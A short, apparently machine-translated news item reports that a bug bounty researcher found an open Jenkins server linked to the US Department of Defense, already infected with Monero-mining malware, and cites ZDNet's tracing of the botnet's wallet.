Russian hackers? 🤔
Baghunter Nitesh Surana discovered mining malware on a Jenkins server owned by the US Department of Defense. The researcher reported this through the official bug bounty program of the Ministry of Defense on HackerOne.
Initially, the problem report concerned an improperly configured Jenkins server running in the AWS cloud and associated with the Ministry of Defense domain. In fact, Surana warned that anyone could access the server without any credentials or checks. Moreover, access was complete, including the file system and even the / script folder, where files are uploaded that the Jenkins server reads and automatically executes at set intervals. Thus, an attacker could establish a permanent backdoor or take complete control of the server.
When the Ministry of Defense staff had already fixed the problem, Surana reviewed his initial findings. The researcher realized that someone had discovered the vulnerability before him, and the vulnerable server was already hacked by someone. So, the expert discovered evidence indicating the presence of a mining malvari specializing in mining Monero cryptocurrency.
ZDNet reports that the address of the wallet that used the botnet has been mentioned on Google dozens of times since August 2018. Most of the references are complaints from Chinese users who discovered miners on their cloud servers.
Using the XMRHunter service, reporters found that this wallet currently contains 35.4 Monero (approximately $ 2,700). However, the botnet could use other wallets to collect the received tokens, so it is hardly possible to evaluate the efficiency of the Malvari in this way.